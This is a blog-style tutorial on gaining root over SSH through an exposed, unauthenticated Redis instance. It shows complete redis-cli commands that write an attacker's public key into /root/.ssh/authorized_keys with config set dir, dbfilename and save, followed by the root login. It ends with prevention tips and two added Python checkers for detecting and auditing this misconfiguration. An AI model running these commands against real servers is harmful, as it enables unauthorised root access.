


A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)
This article will talk about the principles of Redis mining, see how to prevent it, and share prevention techniques. I hope it will be helpful to everyone!
The author has also been attacked by a mining virus, which was very uncomfortable, but in fact, as long as you understand the means of intrusion, it is very easy to prevent. Today we will demonstrate how Redis can be used for privilege escalation to obtain the root user of a remote server.
1. First we need some prerequisites
Condition 1: First, there must be a Redis instance, and we must know its port [default 6379];
Condition 2: The password of Redis cannot be too complex, or there is no password;
Condition 3: The user who starts Redis is preferably a Root user, which will be more destructive;
2. Start making trouble
- 2.1 Create a key pair
Generate a key pair with ssh-keygen. Of course, an existing pair works just as well.
root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Next, the value that will be stored in Redis is generated from the public key.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
The content is as follows
root@kali:/tmp/rediskey# cat foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
The two newlines added before and after the key keep it on a line of its own, so that it does not run together with the surrounding data and fail.
- 2.2 Write the key into Redis
The operation is as follows:
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Connect to Redis and check whether the value has been written.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
- 2.3 Replace system files through the Redis saving mechanism
Let’s see the following operations
192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Now we log in to the remote host to check the effect.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w
OK, we have successfully escalated our privileges here. So what is the exported file? In fact, it is just a file in Redis's own save format. If you are interested, you can open it yourself and have a look. It will not be shown here.
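Because the exported file is a Redis snapshot, it can be recognised on disk: RDB snapshots begin with the ASCII magic `REDIS` followed by a four-digit format version, and sshd skips the lines it cannot parse, which is why the embedded key still works. The following check is an added example, not part of the original article; the function name, the sample key and the abbreviated snapshot framing are constructed for illustration.

```python
import re

# RDB snapshots start with the ASCII magic "REDIS" plus a 4-digit format version.
RDB_MAGIC = re.compile(rb"^REDIS(\d{4})")
# A public-key entry: key type, base64 blob, optional comment (options may precede it).
KEY_LINE = re.compile(
    rb"(?:^|[ \t])(ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521)) "
    rb"([A-Za-z0-9+/]+=*)(?:[ \t]+(.*))?$"
)

# Constructed sample data: a fake key wrapped in abbreviated RDB framing,
# and an ordinary authorized_keys file for comparison.
SAMPLE_KEY = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQCconstructed0example0key demo@example"
SAMPLE_DUMP = (
    b"REDIS0009\xfa\tredis-ver\x055.0.3\xfe\x00\xfb\x01\x00\x00\x03bar\x40\x50"
    b"\n\n\n" + SAMPLE_KEY + b"\n\n\n\n" + b"\xff" + bytes(8)
)
CLEAN_FILE = b"# ops team\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIconstructedkey ops@example\n"


def inspect_authorized_keys(data: bytes) -> dict:
    """Report whether an authorized_keys blob is really a Redis snapshot."""
    magic = RDB_MAGIC.match(data)
    keys, junk = [], 0
    for raw in data.split(b"\n"):
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        m = KEY_LINE.search(line)
        if m:
            comment = (m.group(3) or b"").decode("ascii", "replace")
            keys.append((m.group(1).decode(), comment))
        else:
            junk += 1  # binary snapshot framing or an otherwise unparsable line
    return {
        "is_redis_dump": magic is not None,
        "rdb_version": magic.group(1).decode() if magic else None,
        "keys": keys,          # (key type, comment) pairs to review
        "junk_lines": junk,    # non-key lines; should be 0 in a healthy file
    }


if __name__ == "__main__":
    print(inspect_authorized_keys(SAMPLE_DUMP))
    print(inspect_authorized_keys(CLEAN_FILE))
```

On a real host, pass the bytes of each user's `~/.ssh/authorized_keys`; a file flagged as a Redis dump means the key it contains was not placed there by an administrator.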
3. How to prevent
This vulnerability is quite powerful. So far we only have access to one host, but what if the access is used to add scripts to the scheduled tasks and then infect hosts in batches?
Tips for prevention are as follows:
Redis should not listen on dangerous IPs. If it must, add firewall controls;
Redis must be protected with a password, and it must not be a weak one;
Try not to start Redis as the root user.
Follow the above three points and Redis mining can be prevented without any problem.
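The three tips can be checked mechanically against a `redis.conf`. The audit below is an added example, not part of the original article; the function names, the 16-character password threshold, the small weak-password list and both sample configurations are assumptions made for illustration, and the account that runs `redis-server` is supplied by the caller.

```python
import shlex

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}
MIN_PASSWORD_LEN = 16  # assumed policy threshold, not a Redis rule
COMMON_PASSWORDS = {"123456", "password", "redis", "foobared", "admin"}  # assumed list

# Constructed sample configurations.
WEAK_CONF = "port 6379\nbind 0.0.0.0\n# requirepass foobared\n"
HARDENED_CONF = 'bind 127.0.0.1 -::1\nrequirepass "c0nstructed-sample-passphrase-2f9a"\n'


def parse_redis_conf(text: str) -> dict:
    """Return {directive: [args]}; the last occurrence of a directive wins."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted arguments
        conf[parts[0].lower()] = parts[1:]
    return conf


def audit(conf_text: str, run_as_user: str) -> list:
    """Check the three prevention tips; returns a list of findings."""
    conf = parse_redis_conf(conf_text)
    findings = []
    # Tip 1: listening address ("-" prefix marks an optional address).
    binds = [b.lstrip("-") for b in conf.get("bind", [])]
    if not binds:
        findings.append("bind: not set, Redis listens on all interfaces")
    elif any(b in WILDCARD_BINDS for b in binds):
        findings.append("bind: wildcard address, restrict it or firewall the port")
    # Tip 2: password present and not weak.
    password = "".join(conf.get("requirepass", []))
    if not password:
        findings.append("requirepass: no password set")
    elif len(password) < MIN_PASSWORD_LEN or password.lower() in COMMON_PASSWORDS:
        findings.append("requirepass: weak password")
    # Tip 3: the account that owns the redis-server process.
    if run_as_user == "root":
        findings.append("user: redis-server runs as root")
    return findings


if __name__ == "__main__":
    print(audit(WEAK_CONF, "root"))
    print(audit(HARDENED_CONF, "redis"))
```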